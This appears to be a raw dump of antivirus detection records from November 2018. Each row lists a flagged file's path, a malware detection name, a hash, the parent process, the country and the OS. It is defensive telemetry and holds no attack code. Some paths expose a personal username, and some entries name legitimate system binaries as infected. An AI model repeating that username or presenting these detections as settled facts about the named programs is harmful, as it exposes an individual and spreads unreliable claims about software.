 [Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T13:45:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-001902-3463f2a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e5d1dd93\\AVSCAN-20181103-001427-17BABDA0\\AVSCAN-20181103-001902-3463F2A4', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:18:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='59d42f667f52e4572ae41eba26f810867c3a9b041622fb5bbbc5818e8f6f7fe8', metadata=Row(cmdline='-k secsvcs', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:45:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T13:22:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Sample Music\\Music.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:29:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:21:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T07:05:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T01:02:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='-&jf+novcs.exe', filepath='C:\\Program Files\\Simple XML Editor\\F3E6P0L3TQDUWIQJ3YLRGF5TGFY\\-&jf+NOVcs.exe', filesize=640000, name='TR/Dropper.Gen.#M300.#R4046'), hash='66fbd02d6b8a876cfa17da6c1444ffa817175a6ab70f5690b1e9fd07d9ba6b2d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:RO1BHR\\\\\\/Dyk2xCNjE.1', country='SC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:51:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:10:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='-&jf+novcs.exe', filepath='C:\\Program Files\\Simple XML Editor\\F3E6P0L3TQDUWIQJ3YLRGF5TGFY\\-&jf+NOVcs.exe', filesize=640000, name='TR/Dropper.Gen.#M300.#R4046'), hash='66fbd02d6b8a876cfa17da6c1444ffa817175a6ab70f5690b1e9fd07d9ba6b2d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:RO1BHR\\\\\\/Dyk2xCNjE.1', country='SC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:51:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155948-ec0569a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155948-EC0569A0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150237-23b56917', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c93cbd7c\\AVSCAN-20181102-150106-13EB1318\\AVSCAN-20181102-150237-23B56917', filesize=5600000, name='PUA/MyPCBackup.#M1.#R1'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:02:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160007-edfbec49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160007-EDFBEC49', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:21:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-210036-7ea06b16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1b74552d\\AVSCAN-20181102-204439-D7908571\\AVSCAN-20181102-210036-7EA06B16', filesize=1536000, name='TR/CoinMiner.CW.#M1.#R1'), hash='6aee240dfea62ae0faa6b60867f34b25450b3f8d09ad924f6993d7252f897862', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:00:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T19:45:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cfp.exe', filepath='C:\\Users\\X\\Desktop\\Miracle Box crack 2.54 free 2018\\Miracle Box crack 2.54 free 2018\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='4aa835632e3b4fbe2f82441f5e38bb1cad962cf0569cf46b1344fc3bb2a0642c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T20:31:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='konvert245.exe', filepath='\\\\192.168.2.4\\daten\\LC2\\lc\\buf\\lctop2.45-31.03.14\\konvert245.exe', filesize=18560000, name='W32/Infector.Gen9.#M300.#R800021'), hash='16406fc404c83d378fd85aff83733a76fb02eaaa3863f5db65229c1238998e3b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:9RDTQEcFJ0Kb0csk.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:04:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fjxhszktc.exe', filepath='E:\\fjxhszktc.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='4760b409daca9e0d5936e8b51c98c7ec7e0ec2d22203f5ce117ae8716a7f3d5e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T00:23:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ma tran toan 5.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\ma tran toan 5.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0cd1a613e871e459906b02e7a504ac121fec2540a552c77ff1b0398b976a99d0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T12:10:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tinotification.html', filepath='F:\\_\\SONORA\\SONORA A\\MEbook\\modules\\ui\\1.3.1-beta\\tinotification.html', filesize=232000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='37740f777c8559a800a2759b676d035c8fe1a92ceb6f61fb5137fef4261294ee', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=103696, timestamp='2018-11-02T13:37:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-114149-cf1f4d1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_262c9480\\AVSCAN-20181102-113642-942BE6CD\\AVSCAN-20181102-114149-CF1F4D1E', filesize=384000, name='HEUR/AGEN.1012225.#M1.#R1'), hash='35ec41a5ad0517ec1e10ef9c2c607081f17ccbc5f4b6de43942711cfac92e2db', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:41:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-205428-02c8644d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06b172c4\\AVSCAN-20181102-205309-F8D8B1C1\\AVSCAN-20181102-205428-02C8644D', filesize=1792000, name='TR/AD.Bhottle.fmbdh.#M1.#R1'), hash='251e9a9e2489ce743164fbaaa948e58e70c819f0862e996beacd4be7ccf9d437', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:54:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134156-80419a3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134156-80419A3C', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:41:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clickjogos - sirenix surfistas - winx club (1).exe', filepath='C:\\Users\\X\\Documents\\DRAFTS\\Cotações  2016\\ClickJogos - Sirenix Surfistas - Winx Club (1).exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='348888a26e74093c0f08d368a961257b96b0f5c4533a693746bef050d1b8d0cf', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T18:28:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:03:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3e8bb698992fa07dc70b0c98cffe764622cc1cbe2f8191fa18e8bbca9d66456b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='navnet_garmin_v359.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\IDM\\DwnlData\\X230\\navnet_Garmin_v359_276\\navnet_Garmin_v359.exe', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline='-Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3952696, timestamp='2018-11-02T00:41:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='العاب فلاش.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\العاب فلاش\\العاب فلاش.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='204b278f762ef8d4d63924e537de775d52198026aebcac9ae718c7f1fa005c6c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211406-dfa1a8a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211406-DFA1A8A2', filesize=2732000, name='ADWARE/PullUpdate.Gen7.#M1.#R1'), hash='36737fdec959599bcadd83a1e629a595b32974d2de7b93fc56e4a8c844995aff', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:14:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-011023-690b3737', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb24b2b1\\AVSCAN-20181102-011002-660CC1DD\\AVSCAN-20181102-011023-690B3737', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:10:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155314-3ce29d5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47786593\\AVSCAN-20181102-155206-32FCC3D1\\AVSCAN-20181102-155314-3CE29D5E', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:53:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055203-64b796d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055203-64B796D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:24:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wgccughq.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\WGccUghQ.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:57Z'), dt=datetime.date(2018, 11, 2)),
